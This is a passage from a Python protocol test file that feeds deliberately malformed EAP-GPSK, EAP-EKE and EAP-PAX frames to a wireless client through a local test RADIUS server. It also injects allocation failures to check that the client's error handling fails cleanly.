4 + 1 + 1,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_3)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-3 Mismatch in RAND_Peer")
return struct.pack(">BBHBB8L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 32,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_3,
0, 0, 0, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-3 Missing RAND_Server")
msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 32,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_3)
msg += req[14:46]
return msg
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-3 Mismatch in RAND_Server")
msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 32 + 32,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_3)
msg += req[14:46]
msg += struct.pack(">8L", 1, 1, 1, 1, 1, 1, 1, 1)
return msg
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-3 Missing ID_Server")
msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 32 + 32,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_3)
msg += req[14:46]
msg += struct.pack(">8L", 0, 0, 0, 0, 0, 0, 0, 0)
return msg
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-3 Truncated ID_Server")
msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 32 + 32 + 2,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_3)
msg += req[14:46]
msg += struct.pack(">8LH", 0, 0, 0, 0, 0, 0, 0, 0, 1)
return msg
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-3 Mismatch in ID_Server")
msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 32 + 32 + 3,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_3)
msg += req[14:46]
msg += struct.pack(">8LHB", 0, 0, 0, 0, 0, 0, 0, 0, 1, ord('B'))
return msg
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite")
return struct.pack(">BBHBBHB8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 3 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 1, ord('A'),
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-3 Mismatch in ID_Server (same length)")
msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 32 + 32 + 3,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_3)
msg += req[15:47]
msg += struct.pack(">8LHB", 0, 0, 0, 0, 0, 0, 0, 0, 1, ord('B'))
return msg
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-3 Missing CSuite_Sel")
msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 32 + 32 + 2,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_3)
msg += req[14:46]
msg += struct.pack(">8LH", 0, 0, 0, 0, 0, 0, 0, 0, 0)
return msg
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-3 Mismatch in CSuite_Sel")
msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 32 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_3)
msg += req[14:46]
msg += struct.pack(">8LHLH", 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2)
return msg
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-3 Missing len(PD_Payload_Block)")
msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 32 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_3)
msg += req[14:46]
msg += struct.pack(">8LHLH", 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1)
return msg
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-3 Truncated PD_Payload_Block")
msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 32 + 32 + 2 + 6 + 2,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_3)
msg += req[14:46]
msg += struct.pack(">8LHLHH", 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1)
return msg
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-3 Missing MAC")
msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 32 + 32 + 2 + 6 + 3,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_3)
msg += req[14:46]
msg += struct.pack(">8LHLHHB",
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 123)
return msg
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-3 Incorrect MAC")
msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 32 + 32 + 2 + 6 + 3 + 16,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_3)
msg += req[14:46]
msg += struct.pack(">8LHLHHB4L",
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 123,
0, 0, 0, 0)
return msg
return None
srv = start_radius_server(gpsk_handler)
try:
hapd = start_ap(apdev[0])
for i in range(0, 27):
if i == 12:
pw = "short"
else:
pw = "abcdefghijklmnop0123456789abcdef"
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="GPSK", identity="user", password=pw,
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
time.sleep(0.05)
dev[0].request("REMOVE_NETWORK all")
finally:
stop_radius_server(srv)
EAP_EKE_ID = 1
EAP_EKE_COMMIT = 2
EAP_EKE_CONFIRM = 3
EAP_EKE_FAILURE = 4
def test_eap_proto_eke(dev, apdev):
"""EAP-EKE protocol tests"""
def eke_handler(ctx, req):
logger.info("eke_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing payload")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_EKE)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unknown exchange")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_EKE,
255)
idx += 1
if ctx['num'] == idx:
logger.info("Test: No NumProposals in EAP-EKE-ID/Request")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_EKE,
EAP_EKE_ID)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: NumProposals=0 in EAP-EKE-ID/Request")
return struct.pack(">BBHBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 1,
EAP_TYPE_EKE,
EAP_EKE_ID,
0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Truncated Proposals list in EAP-EKE-ID/Request")
return struct.pack(">BBHBBBB4B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 4,
EAP_TYPE_EKE,
EAP_EKE_ID,
2, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unsupported proposals in EAP-EKE-ID/Request")
return struct.pack(">BBHBBBB4B4B4B4B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 4 * 4,
EAP_TYPE_EKE,
EAP_EKE_ID,
4, 0,
0, 0, 0, 0,
3, 0, 0, 0,
3, 1, 0, 0,
3, 1, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing IDType/Identity in EAP-EKE-ID/Request")
return struct.pack(">BBHBBBB4B4B4B4B4B",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 5 * 4,
EAP_TYPE_EKE,
EAP_EKE_ID,
5, 0,
0, 0, 0, 0,
3, 0, 0, 0,
3, 1, 0, 0,
3, 1, 1, 0,
3, 1, 1, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid EAP-EKE-ID/Request")
return struct.pack(">BBHBBBB4BB",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 4 + 1,
EAP_TYPE_EKE,
EAP_EKE_ID,
1, 0,
3, 1, 1, 1,
255)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected EAP-EKE-ID/Request")
return struct.pack(">BBHBBBB4BB",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 4 + 1,
EAP_TYPE_EKE,
EAP_EKE_ID,
1, 0,
3, 1, 1, 1,
255)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid EAP-EKE-ID/Request")
return struct.pack(">BBHBBBB4BB",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 4 + 1,
EAP_TYPE_EKE,
EAP_EKE_ID,
1, 0,
3, 1, 1, 1,
255)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected EAP-EKE-Confirm/Request")
return struct.pack(">BBHBB",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_EKE,
EAP_EKE_CONFIRM)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too short EAP-EKE-Failure/Request")
return struct.pack(">BBHBB",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_EKE,
EAP_EKE_FAILURE)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected EAP-EKE-Commit/Request")
return struct.pack(">BBHBB",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_EKE,
EAP_EKE_COMMIT)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid EAP-EKE-ID/Request")
return struct.pack(">BBHBBBB4BB",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 4 + 1,
EAP_TYPE_EKE,
EAP_EKE_ID,
1, 0,
3, 1, 1, 1,
255)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too short EAP-EKE-Commit/Request")
return struct.pack(">BBHBB",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_EKE,
EAP_EKE_COMMIT)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid EAP-EKE-ID/Request")
return struct.pack(">BBHBBBB4BB",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 4 + 1,
EAP_TYPE_EKE,
EAP_EKE_ID,
1, 0,
1, 1, 1, 1,
255)
idx += 1
if ctx['num'] == idx:
logger.info("Test: All zeroes DHComponent_S and empty CBvalue in EAP-EKE-Commit/Request")
return struct.pack(">BBHBB4L32L",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 16 + 128,
EAP_TYPE_EKE,
EAP_EKE_COMMIT,
0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too short EAP-EKE-Confirm/Request")
return struct.pack(">BBHBB",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_EKE,
EAP_EKE_CONFIRM)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid EAP-EKE-ID/Request")
return struct.pack(">BBHBBBB4BB",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 4 + 1,
EAP_TYPE_EKE,
EAP_EKE_ID,
1, 0,
1, 1, 1, 1,
255)
idx += 1
if ctx['num'] == idx:
logger.info("Test: All zeroes DHComponent_S and empty CBvalue in EAP-EKE-Commit/Request")
return struct.pack(">BBHBB4L32L",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 16 + 128,
EAP_TYPE_EKE,
EAP_EKE_COMMIT,
0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid PNonce_PS and Auth_S values in EAP-EKE-Confirm/Request")
return struct.pack(">BBHBB4L8L5L5L",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 16 + 2 * 16 + 20 + 20,
EAP_TYPE_EKE,
EAP_EKE_CONFIRM,
0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0,
0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
return None
srv = start_radius_server(eke_handler)
try:
hapd = start_ap(apdev[0])
for i in range(0, 14):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="EKE", identity="user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
if i in [ 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13 ]:
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"],
timeout=10)
if ev is None:
raise Exception("Timeout on EAP failure")
else:
time.sleep(0.05)
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
finally:
stop_radius_server(srv)
def eap_eke_test_fail(dev, phase1=None, success=False):
dev.connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="EKE", identity="eke user@domain", password="hello",
phase1=phase1, erp="1", wait_connect=False)
ev = dev.wait_event([ "CTRL-EVENT-EAP-FAILURE",
"CTRL-EVENT-EAP-SUCCESS" ], timeout=5)
if ev is None:
raise Exception("Timeout on EAP failure")
if not success and "CTRL-EVENT-EAP-FAILURE" not in ev:
raise Exception("EAP did not fail during failure test")
dev.request("REMOVE_NETWORK all")
dev.wait_disconnected()
def test_eap_proto_eke_errors(dev, apdev):
"""EAP-EKE local error cases"""
check_eap_capa(dev[0], "EKE")
params = hostapd.wpa2_eap_params(ssid="eap-test")
hapd = hostapd.add_ap(apdev[0], params)
for i in range(1, 3):
with alloc_fail(dev[0], i, "eap_eke_init"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="EKE", identity="eke user", password="hello",
wait_connect=False)
ev = dev[0].wait_event(["EAP: Failed to initialize EAP method"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
tests = [ (1, "eap_eke_dh_init", None),
(1, "eap_eke_prf_hmac_sha1", "dhgroup=3 encr=1 prf=1 mac=1"),
(1, "eap_eke_prf_hmac_sha256", "dhgroup=5 encr=1 prf=2 mac=2"),
(1, "eap_eke_prf", None),
(1, "os_get_random;eap_eke_dhcomp", None),
(1, "aes_128_cbc_encrypt;eap_eke_dhcomp", None),
(1, "aes_128_cbc_decrypt;eap_eke_shared_secret", None),
(1, "eap_eke_prf;eap_eke_shared_secret", None),
(1, "eap_eke_prfplus;eap_eke_derive_ke_ki", None),
(1, "eap_eke_prfplus;eap_eke_derive_ka", None),
(1, "eap_eke_prfplus;eap_eke_derive_msk", None),
(1, "os_get_random;eap_eke_prot", None),
(1, "aes_128_cbc_decrypt;eap_eke_decrypt_prot", None),
(1, "eap_eke_derive_key;eap_eke_process_commit", None),
(1, "eap_eke_dh_init;eap_eke_process_commit", None),
(1, "eap_eke_shared_secret;eap_eke_process_commit", None),
(1, "eap_eke_derive_ke_ki;eap_eke_process_commit", None),
(1, "eap_eke_dhcomp;eap_eke_process_commit", None),
(1, "os_get_random;eap_eke_process_commit", None),
(1, "os_get_random;=eap_eke_process_commit", None),
(1, "eap_eke_prot;eap_eke_process_commit", None),
(1, "eap_eke_decrypt_prot;eap_eke_process_confirm", None),
(1, "eap_eke_derive_ka;eap_eke_process_confirm", None),
(1, "eap_eke_auth;eap_eke_process_confirm", None),
(2, "eap_eke_auth;eap_eke_process_confirm", None),
(1, "eap_eke_prot;eap_eke_process_confirm", None),
(1, "eap_eke_derive_msk;eap_eke_process_confirm", None) ]
for count, func, phase1 in tests:
with fail_test(dev[0], count, func):
eap_eke_test_fail(dev[0], phase1)
tests = [ (1, "=eap_eke_derive_ke_ki", None),
(1, "=eap_eke_derive_ka", None),
(1, "=eap_eke_derive_msk", None),
(1, "eap_eke_build_msg;eap_eke_process_id", None),
(1, "wpabuf_alloc;eap_eke_process_id", None),
(1, "=eap_eke_process_id", None),
(1, "wpabuf_alloc;=eap_eke_process_id", None),
(1, "wpabuf_alloc;eap_eke_process_id", None),
(1, "eap_eke_build_msg;eap_eke_process_commit", None),
(1, "wpabuf_resize;eap_eke_process_commit", None),
(1, "eap_eke_build_msg;eap_eke_process_confirm", None) ]
for count, func, phase1 in tests:
with alloc_fail(dev[0], count, func):
eap_eke_test_fail(dev[0], phase1)
tests = [ (1, "eap_eke_getKey", None),
(1, "eap_eke_get_emsk", None),
(1, "eap_eke_get_session_id", None) ]
for count, func, phase1 in tests:
with alloc_fail(dev[0], count, func):
eap_eke_test_fail(dev[0], phase1, success=True)
EAP_PAX_OP_STD_1 = 0x01
EAP_PAX_OP_STD_2 = 0x02
EAP_PAX_OP_STD_3 = 0x03
EAP_PAX_OP_SEC_1 = 0x11
EAP_PAX_OP_SEC_2 = 0x12
EAP_PAX_OP_SEC_3 = 0x13
EAP_PAX_OP_SEC_4 = 0x14
EAP_PAX_OP_SEC_5 = 0x15
EAP_PAX_OP_ACK = 0x21
EAP_PAX_FLAGS_MF = 0x01
EAP_PAX_FLAGS_CE = 0x02
EAP_PAX_FLAGS_AI = 0x04
EAP_PAX_MAC_HMAC_SHA1_128 = 0x01
EAP_PAX_HMAC_SHA256_128 = 0x02
EAP_PAX_DH_GROUP_NONE = 0x00
EAP_PAX_DH_GROUP_2048_MODP = 0x01
EAP_PAX_DH_GROUP_3072_MODP = 0x02
EAP_PAX_DH_GROUP_NIST_ECC_P_256 = 0x03
EAP_PAX_PUBLIC_KEY_NONE = 0x00
EAP_PAX_PUBLIC_KEY_RSAES_OAEP = 0x01
EAP_PAX_PUBLIC_KEY_RSA_PKCS1_V1_5 = 0x02
EAP_PAX_PUBLIC_KEY_EL_GAMAL_NIST_ECC = 0x03
EAP_PAX_ADE_VENDOR_SPECIFIC = 0x01
EAP_PAX_ADE_CLIENT_CHANNEL_BINDING = 0x02
EAP_PAX_ADE_SERVER_CHANNEL_BINDING = 0x03
def test_eap_proto_pax(dev, apdev):
"""EAP-PAX protocol tests"""
def pax_std_1(ctx):
logger.info("Test: STD-1")
ctx['id'] = 10
return struct.pack(">BBHBBBBBBH8L16B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 2 + 32 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
32, 0, 0, 0, 0, 0, 0, 0, 0,
0x16, 0xc9, 0x08, 0x9d, 0x98, 0xa5, 0x6e, 0x1f,
0xf0, 0xac, 0xcf, 0xc4, 0x66, 0xcd, 0x2d, 0xbf)
def pax_handler(ctx, req):
logger.info("pax_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing payload")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_PAX)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Minimum length payload")
return struct.pack(">BBHB4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 16,
EAP_TYPE_PAX,
0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unsupported MAC ID")
return struct.pack(">BBHBBBBBB4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_1, 0, 255, EAP_PAX_DH_GROUP_NONE,
EAP_PAX_PUBLIC_KEY_NONE,
0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unsupported DH Group ID")
return struct.pack(">BBHBBBBBB4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
255, EAP_PAX_PUBLIC_KEY_NONE,
0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unsupported Public Key ID")
return struct.pack(">BBHBBBBBB4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
EAP_PAX_DH_GROUP_NONE, 255,
0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: More fragments")
return struct.pack(">BBHBBBBBB4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_1, EAP_PAX_FLAGS_MF,
EAP_PAX_MAC_HMAC_SHA1_128,
EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid ICV")
return struct.pack(">BBHBBBBBB4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid ICV in short frame")
return struct.pack(">BBHBBBBBB3L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 12,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Correct ICV - unsupported op_code")
ctx['id'] = 10
return struct.pack(">BBHBBBBBB16B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 16,
EAP_TYPE_PAX,
255, 0, EAP_PAX_MAC_HMAC_SHA1_128,
EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
0x90, 0x78, 0x97, 0x38, 0x29, 0x94, 0x32, 0xd4,
0x81, 0x27, 0xe0, 0xf6, 0x3b, 0x0d, 0xb2, 0xb2)
idx += 1
